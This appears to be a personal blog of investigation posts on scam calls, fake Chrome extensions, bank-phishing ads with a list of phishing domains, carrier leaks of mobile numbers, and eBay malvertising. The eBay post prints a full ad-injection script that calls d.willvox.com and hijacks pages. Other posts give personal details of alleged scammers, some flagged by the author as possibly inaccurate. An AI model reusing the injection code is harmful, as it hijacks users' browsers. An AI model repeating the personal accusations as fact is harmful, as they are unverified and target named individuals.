Simple.. Which microphones are used on the Lenovo P2 phone.
On a call: The one on the bottom left of the phone edge, down and to the left of the home button.
When on speakerphone: The one at the top edge of the phone.
Voice Recorder (by Splend Apps): The one on the bottom left of the phone edge, down and to the left of the home button.
Recording a video using inbuilt app or Open Camera: The one on the bottom left of the phone edge, down and to the left of the home button and the one at the top edge of the phone. The top microphone is the left audio channel and the bottom left microphone is the right audio channel. (Possibly reversed depending on orientation of the phone I guess).
A cold call came into a land line in a plant room while I happened to be in there.
The line being called is not published anywhere and is only there to host broadband. There is no “leak” of info here, just some spammy autodialler.
Initially an Indian lady claimed she was calling from BT and that the connection was sending viruses. Then when she was sure I was “hooked” as a victim she transferred me to an Indian guy.
Sadly as I was in a plant room and on a standard land line phone I couldn’t record the call. I did have access to a virtual machine.
They initially attempted to get me to go to help87.com (which for some reason on the connection I was on would not load).
Then when that failed they got me to use the SupRemo remote software. Again, as I was on-site at a job I spent about 50 minutes trolling them along but had to give up in the end. We didn’t get to the payment stage.
Once the scammer got connected he tried to use the W3C validator (again, a site that wasn’t loading for some reason) and when that failed he used the “tree” command in dos to claim that the system was scanning and cleaning viruses.
The only things I have to go on are the initial domain he tried to use:
help87.com
and the phone caller ID: 01245785847 (aka. +441245785847 or “01245 785 847” / “01245 785847”) in the UK.
The phone number doesn’t lead anywhere other than a few other people complaining about scam calls.
Let’s focus on the domain. There are two references to threatexpert reports. Sadly it looks like Symantec have eaten threatexpert and have taken down their free public reports.
The only remaining thing I can go on is the IP, 107.180.9.83, which resolves to a GoDaddy IP “ip-107-180-9-83.ip.secureserver.net”.
I don’t think this is a shared server. It looks like a private dedicated or virtual dedicated. The SSL certificate on it references, “softwaretweak.co” “akick.com” and “akickoptimizer.com”. This domain seems to sell lots of badly written software including “PC Booster” type software.
If you go to buy the software on that site it takes you to a non-secure form that asks for credit card details!
They also claim to me Microsoft Gold partners but the link to verify doesn’t work.
The Microsoft page above ties it all together too. They reference gattsupport.com (hosted on a different server within the same IP range)which has the same domain registration of technocaretechnology.com!
abhishek.semm@technocaretechnology.com
H-68, Sector-63
City Noida
State Uttar Pradesh
Postal 201307
Country INDIA
Phone 919654796904
The original IP once had a domain gattsupportcom.com pointing at it.
2) They’ve been posting on the Microsoft forums on how to “get [their antivirus] listed in windows security center”: here and here.
Another likely link to them being the same people is another domain on the IP, technocaretechnology.com and gatechnocaretechnology.com, who seem to do outsourced phone support and other business processes.
Other domains on the same server that have no content:
kristechllc.com
In summary: It is my opinion that this company is a scam and, in their downtime, cold call people to attempt to get them to pay for services or products that they don’t need. Certainly they do the standard event viewer “scare” tactics and lie about the reason for the call.
Update 2018-06-25: Looks like Google have removed at least two of the suspicious extensions from the Chrome Store.. one still remains online.
I’ve seen a strange advert around the internet recently .. sadly I don’t have a screenshot of the advert but it was claiming that I could click on it to get maps and directions.
Upon clicking on it via the advert you see a page relating to map directions:
However on the second visit to the advert page if you don’t go via the advert and have cleared your cookies you get a very different page:
Already suspicious.. why offer a “mapping” extension which is titled “Slideshow” and then why hide the mapping part of it if someone visits the site without going via the advert?
Clicking any of the elements on the page prompts you to install suspiciously named Google Chrome extensions. Such as:
So, you install the extension.. and nothing useful happens. You don’t get driving directions but you do get horse pictures or other rotating GIF pictures inserted into the Google home page (as shown in the extension screenshot). At the time of screenshotting above the extension had 12,000 uses, as of time of writing this it now has 14,000 users.
The extension content as the ability to modify absolutely any web page the user visits. At the time of writing it appears to not be doing anything malicious.. the sites it regex matches against are Google domains..
Upon visiting a Google home page it then fetches some code from the extension host domain. This, at the moment, is just GIFs. It then injects that GIF code into the page.
What is the point. Someone is spending $$ on clicks on adverts to install a Chrome extension that doesn’t do anything related to the claims in the advert.
It almost seems like they are gathering a user base and will sell? or change? the Chrome Extension in the future to do something malicious or unintended.
So… is Google dumb enough to allow this? It seems so!
You click on it.. spot the difference.
vs
Google are allowing a phishing site to advertise on keywords for a UK bank!
To make identification of this site more difficult it seems that if you visit the site without Google as the referer you get either a 404.. or a website that looks like it is for an accountancy practice.
Poor show.. time to report the advert to Google.
However it looks like it isn’t the first time. I can find similar names that have likely had the same scam
hsbcsaving.info – HSBC Bank phishing site
tsbinternet.info – UK Bank; TSB phishing site
tsbinternetsavings.org – UK Bank; TSB phishing site
tsbinternetaccounts.org – UK Bank; TSB phishing site
cbonline.live – Clydesdale Bank phishing site
cbonllne.group – Clydesdale Bank phishing site
cbonlive.group – Clydesdale Bank phishing site
cbonline.online – Clydesdale Bank phishing site
clydesdaleco.xyz – Clydesdale Bank phishing site
cbinternetacc.site – Clydesdale Bank phishing site
cbinternetaccountants.xyz – Clydesdale Bank phishing site
cbonlineaccount.info – Clydesdale Bank phishing site
cbolines.online – Clydesdale Bank phishing site
chasesavingsacc.com – US bank “Chase” phishing site
cbonlinesaver.info – Clydesdale Bank phishing site
cbonlinesaveracc.info – Clydesdale Bank phishing site
cbinternetacc.xyz – Clydesdale Bank phishing site
ntwestm.info – UK Bank NatWest phishing site
personalnatwst.info – UK Bank NatWest phishing site
ylbonline.ltd – Yorkshire Bank phishing site
ybonlline.com – Yorkshire Bank phishing site
ybonlinesavings.xyz – Yorkshire Bank phishing site
ybonllne.systems – Yorkshire Bank phishing site
ylbonline.systems – Yorkshire Bank phishing site
yrkbonline.xyz – Unknown
ysbonline.info – Unknown
ysbonline.info – Unknown
mbinternetaccountant.org – Metro Bank phishing site
mbinternetaccountants.org – Metro Bank phishing site
mbonlinesavings.info – Metro Bank phishing site
mbinternetsaver.com – Metro Bank phishing site
mbinternetaccs.info – Metro Bank phishing site
metrobankinternt.info – Metro Bank phishing site
metrobankinternet.com – Metro Bank phishing site
mbinternetsavings.com – Metro Bank phishing site
mbsavingsacc.info – Metro Bank phishing site
mbonlinehome.info – Metro Bank phishing site
mbinternetsaving.com – Metro Bank phishing site
mbinternt.info – Metro Bank phishing site
mbiinternet.org – Metro Bank phishing site
mbinternetaccount.xyz – Metro Bank phishing site
mtrbonline.info – Metro Bank phishing site
metrbonline.info – Metro Bank phishing site
rbspersonal.xyz – Royal Bank of Scotland phishing site
postoffc.com – UK Bank Post Office phishing site
pstofficeacc.xyz – UK Bank Post Office phishing site
pstoffcsavingsacc.info – UK Bank Post Office phishing site
Most are hosted at “45.76.210.134” (45.76.210.134.vultr.com).
Sorry for the length of this article.. there are so many different parts to this that it is difficult keeping a single sensible train of thought.
I don’t know my mobile number, I don’t use it for calls or texts. It is a SIM I use just for data alone. No Google, Microsoft or any other account has my mobile number.
While browsing a weather website today over 3G on my mobile phone I saw an advert.
Fine.. so what.. an advert.. This one was for “MobiPlanet” (see screenshot top right); the thing that intrigued me about it was the advert touted FlappyBird – as a Subscription. I was interested how they were doing this along with a “free trial”.
Upon clicking the advert I was taken to a screen similar to this one (see screenshot on left):
Except the first time I visited it – it didn’t have the mobile number input prompt. This was missing and only the “Subscribe Now” option existed (see photo to the right).
Stupidly – and thinking that there was no way my browser on my mobile phone was leaking my phone number.. I clicked Subscribe now. To my astonishment I got a text message and was subscribed to the service. No phone number input, no “text back to confirm” feedback loop.
Just instantly subscribed. How! How the heck does a website know my mobile number without me ever inputting it into _anything_.
With a bit of collaboration with a person called “therioman” they confirmed that the same issue affects the 3 other major UK network providers. (O2, Vodafone and EE).
therioman has (very kindly, thank you!) made a video of this happening:
I’m quite angry at this in the first place. I’ve since spent many hours reproducing the “problem”. Lots of tricks are employed to prevent you seeing the same sign up form again, further visits ask you to type in your number.
I can find what I believe to be the API or service that reported my phone number to the advertiser.
Roll in IMI Mobile (“imimobile.net”)!
My reasoning for thinking it is them is… They are the only likely party with access to cell networks customer data. Business relationships get built.. then API access or customer databases get abused.
Remember.. I don’t know my mobile number and I don’t have it associated with anything. The only thing that knows my mobile number is my password vault and my mobile provider, called “Three”, themselves.
So how can an advertiser get my mobile number from just me browsing around?
The most likely cause is IMI Mobile having a “special deal” with the major UK cell networks.. Three and the other networks have probably setup an intercepting proxy for requests to some IMI Mobile domains and subdomains where the subscriber number is injected into an HTTP header. This IMI Mobile can tell the subscriber accessing their service and can then pass it onto the advertiser.
The specific request which does this, I believe, is unusual requests in the advertiser site pointing to a javascript file at IMI Mobile. However these _all_ return a 0 byte (empty) file. E.g.:
It is my belief that the /identify/ request, tagged with a GUID, is sent from your mobile browser to IMI Mobile. IMI Mobile receive the request their end along with the mobile phone number or subscriber details injected by the mobile network.
They then, in the background, pass this information back to the advertiser (probably by the advertiser requesting another back end API asking for details about the GUID). The advertiser can then subscribe you or use your mobile phone number in any way they please.
Reproduction.
On most UK mobile networks.. and especially Three.. visit weather underground and look at the weather for a location. If you see an advert for a subscription service.. click on it.
I expect the first time you visit that advert you won’t be prompted for your mobile number. You will just see a subscribe button. Any subsequent visits will probably show you a prompt to fill in your mobile number.
See the YouTube video further up the post for one users experience.
I also believe that “nuyoo.club”, “pfi.nuyoo.club”, “joinbodyin8.com” are similars site that employs the same “knows your number” trick. They send requests to the imimobile hosts as well.
Also related but not seen in this incident is “api-in.taptobill.com” which has some association with IMImobile. However the tap2bill name appears on a portal called “PFI Admin” at http://mobilepayments.imimobile.net/ .
Other domains that have previously been seen to call in scripts from the IMIMobile domain and could potentially have also been doing the same “no number to enter or feedback loop” subscription:
Interesting to see the price paid in the URL! Mathtag seems to be where things go wrong (as it did last month too). Mathtag respond with some javascript that sends users onto:
Job done! While trying to pollute the eBay visitor with referal code tracking for gamiss, zaful, rosegal, gearbest and aliexpress the zaful page embedded within the advert then has a further embedded youtube video that plays music!
eBay’s only response to this is blaming the user.
If you are reading this and are affected.. it isn’t you.. it is eBay (again!). Feel free to send them to this page so they can read up on their own crappy advertising ecosystem and fix it.
This article is a work in progress, some back in a day or so please.
Unusual one this… a painter decorator friend has been plagued by various attempts at phishing his e-mail logins over the past few months. Each time I’ve got to investigating it the “bad page” in the email link has been removed.
Today I got to one early enough to research it while the site was still active.
It starts with a full e-mail conversation that looks like a client interested in the decorators service:
The decorator responds… and then gets a reply with a supposed link to a design or work order.
With what looks potentially like a unique id for the phishing attempt.
If the victim clicks the link they are presented with the phishing page prompting them to select their chosen login method:
And, if they fall for it, the deed is done.
However.. the person behind it didn’t do a good job of hiding who they are. The website is hosted in Russia but the domain involved with the one I investigated:
zakutasinbola.info
Registered by Saim Raza. They are, for other scams, using the email addresses “fu.d.too.l786@gmail.com”, “fu.d.tool7.86@gmail.com”, “fudtoo.l786@gmail.com”, “fudtool786@gmail.com”, “fudtools@gmail.com”, “fud.tools@gmail.com”, “saim.raza1338@gmail.com” and “saim.raza.133.8@gmail.com” mainly using the telephone number “923241237632”.
Supposedly living in Lahore 31050 Pakistan possibly with family Rizwan, Werwer Shahzaf and Noman.. just going by a Google for the telephone number. These associations may be inaccurate.
This information sent me onto a trove of other likely phishing or malicious domains!
Google doesn’t have much about this payment reference. So here is an article to help!
If you have applied to South West Railway / South West Trains for a Delay Repay refund on a delayed journey you will probably see the refund on your bank account as “JOURNEYCALL PINGIT”.
I am mainly writing this for my own reference as I always forget the script.
Sadly I also can’t credit the person who wrote this script. I didn’t write it! And I can’t find the source of the script by Googling for keywords within the batch file.
A similar version of the script is here but isn’t as feature rich..
Deploying Adobe Flash is always a pain. Firefox blocks it by default now and Chrome seems very variable – works one day and doesn’t work the next.
Additionally while Adobe do provide an MSI download – it doesn’t actually seem to install when set as a Group Policy Installation item. I’ve always had to fall back to the .exe using the below batch file.
@echo off
:: NAME THE EXE WITH THE VERSION NUMBER
SET latestVersion=29.0.0.113
SET version=0
:CheckOS
IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)
:64BIT
echo 64-bit...
SET key="HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX"
goto afteroscheck
:32BIT
echo 32-bit...
SET key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX"
goto afteroscheck
:afteroscheck
:: CHECK IF FLASH AX IS INSTALLED
echo checking %key% for DisplayVersion
SET emptyTest=reg query %key% /v DisplayVersion
IF %ERRORLEVEL%==1 GOTO NOT_INSTALLED
:: CHECK IF FLASH AX IS LATEST
rem FOR /f "tokens=3 delims= " %%# In (
rem 'reg query %key% /v DisplayVersion^|Find "REG_" 2^>Nul') Do (
rem Set "version=%%#"
rem echo Set version to %%#
rem )
rem echo Version in registry reports as %version%
rem IF %version% == %latestVersion% GOTO LATEST_VERSION
for /f "delims=" %%i in ('reg query %key% /v DisplayVersion^|Find "REG_"') do (
rem echo.%%i
echo.%%i | findstr /C:%latestVersion% 1>nul
if errorlevel 1 (
echo not current version installed
Set "version=notcurrent"
) ELSE (
echo Already Installed
GOTO LATEST_VERSION
)
)
:: SEE IF IE IS RUNNING
:IE_CHECK
TASKLIST /NH | FIND /I "iexplore.exe"
IF %ERRORLEVEL%==1 GOTO INSTALL_AX
echo.
echo.
echo Internet Explorer was detected to be running. Adobe Flash Player installation cannot continue.
echo.
echo.
GOTO END
:NOT_INSTALLED
echo Adobe Flash Player for ActiveX not found, installing...
GOTO IE_CHECK
:INSTALL_AX
start "FlashAX" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_active_x.exe" -install
start "FlashPlugin" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_plugin.exe" -install
start "FlashChrome" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_ppapi.exe" -install
echo Completed installation of Adobe Flash Player version %latestVersion% for ActiveX.
GOTO END
:LATEST_VERSION
echo Version %latestVersion% of Adobe Flash Player for ActiveX is already installed.
GOTO END
:END
Remember to change latestVersion=29.0.0.113 to the version of Flash you are installing. Also change the path to the 3 installation files further down in the script.
Hope this helps someone!
Today while browsing eBay I was taken off the eBay site several times and onto “www.gamiss.com/?lkid=13368106”. I did click click or even mouse over any advert.
I’ve seen this happen about 3 or so times in the past year with eBay but today I had time to investigate and trace what is going on.
It looks like eBay are sending visitors to an advertising partner called “pubmatic.com” who are in turn then sending the visitor to “mathtag.com”.. who are then sending advert javascript with content referencing “d.willvox.com” and “zaful.com”
They reference tags.mathtag.com.. something to do with Math Media. An advertising agency or system.
Mathtag then send the following javascript:
<div class="script">
! function() {
var e, t = "https://d.willvox.com",
n = "5a40ca64fc0c4d14be22ffa8",
r = {},
o = {
10: "2005374866234899183",
9: "[SUBID]",
8: "https%3A//ebayadvertising.co.uk/",
7: "[LOCATION_LAT]",
6: "[LOCATION_LONG]",
5: "[DEVICEID]"
},
a = {
10: "2903631",
9: "5344163",
8: "[CUSTOM3]",
7: "[CUSTOM4]",
6: "[CUSTOM5]",
5: "[CUSTOM6]"
},
c = {
10: "[APP_NAME]",
9: "[IDFA]",
8: "[AID]"
};
try {
for (var d = 10; d > 4;) r["z" + d] = o[d], r["c" + d] = a[d], d--;
for (d = 10; d > 7;) r["a" + d] = c[d], d--;
var i = m(r);
function m(e) {
var t, n;
for (var r in "object" == typeof e && (t = ""), e) e.hasOwnProperty(r) && (t = t + "&" + r + "=" + (n = e[r], encodeURIComponent(n)));
return t
}
function p() {
if (window.top) return window.top;
for (var e = window; e.parent;) e = e.parent;
return e
}
function s() {
try {
return p().document.location.href
} catch (e) {
try {
return p().location.hostname
} catch (e) {
return function() {
try {
var e = window.parent.location.ancestorOrigins;
if (e && e.length >= 1) return e[e.length - 1]
} catch (e) {}
}()
}
}
}
function l(e) {
if ("" !== e.responseText) {
var t, n = document.createElement("div");
n.innerHTML = "
<div>" + e.responseText + "</div>
", n = n.firstChild, document.body.appendChild(n);
var r = document.getElementById("adder-inisder"),
o = n.getElementsByTagName("script");
if (o.length > 0)
for (var a = 0; a < o.length; ++a) {
u(o[a])
}
r.parentNode.appendChild(n), r.parentNode.removeChild(r)
} else {
(t = document.createElement("div")).className = "ad-serve-image", t.innerHTML = '<a> <img src="https://d.willvox.com/ad/zaful.jpg" height="250" width="300"> </a>', document.getElementById("adder-inisder").parentNode.appendChild(t);
var c = document.getElementById("adder-inisder");
c.parentNode.removeChild(c)
}
}
function u(e) {
var t = document.createElement("script");
e && (e.text ? t.text = e.text : e.src && (t.src = e.src)), e.parentNode.appendChild(t), e.parentNode.removeChild(e)
}
function h() {
if (200 !== this.status) {
if ("complete" !== document.readyState) var e = setInterval(function() {
"complete" === document.readyState && (clearInterval(e), f())
}, 140);
"complete" === document.readyState ? f() : l(this)
} else l(this)
}
function f() {
try {
e = !(window.self === window.top)
} catch (t) {
e = !0
}
var r = t.concat("/?pid=") + n,
o = {};
e ? (o.mt = function() {
try {
return p().document.URL
} catch (e) {
try {
return p().frames[0].document.referrer
} catch (e) {}
}
}() || "", o.hn = s() || "") : (o.hn = window.location.hostname, o.mt = function() {
try {
for (var e = document.getElementsByTagName("meta"), t = 0; t <span id="mce_SELREST_start" style="overflow:hidden;line-height:0;"></span>< e.length; t++) {
var n = e[t];
if ("og:url" === n.getAttribute.property) return n.getAttribute("content")
}
} catch (e) {}
}() || ""), r += m(o), r += i;
var a = new XMLHttpRequest;
a.onload = h, a.open("GET", r), a.send()
}
f()
} catch (e) {
document.getElementById("adder-inisder").parentNode.removeChild(zpscript)
}
}();
This code looks like it is supposed to be showing the following advert: https://d.willvox.com/ad/zaful.jpg possibly if the browser doesn’t support JavaScript(?) but it also triggers yet another request to https://d.willvox.com (see the last screenshot) which responds with.
And the deed is done. Something within the iframe for gamiss hijacks the entire page and takes you off ebay. It looks like an attempt to deploy affiliate cookies to people so that when, and if, they visit the websites referenced above and make a purchase – the person behind the junk adverts gets a kickback.
Piss poor vetting and subsequent takedown of rogue adverts. This has been a problem for at least a couple of days at this point. eBay is what I’ve seen people refer to as a “dumpster fire”. Lacking competition and drive to do things right.
Looking into the domain involved more (d.willvox.com) it seems that the following person is the owner of the domain:
Email maheshrajiv@gmail.com
Name Thevar
Organization Mahesh
Street Address
Matunga
Mumbai
Maharashtra
400019
India
Phone 919029929719
They also own other similarly named and fishy looking domains:
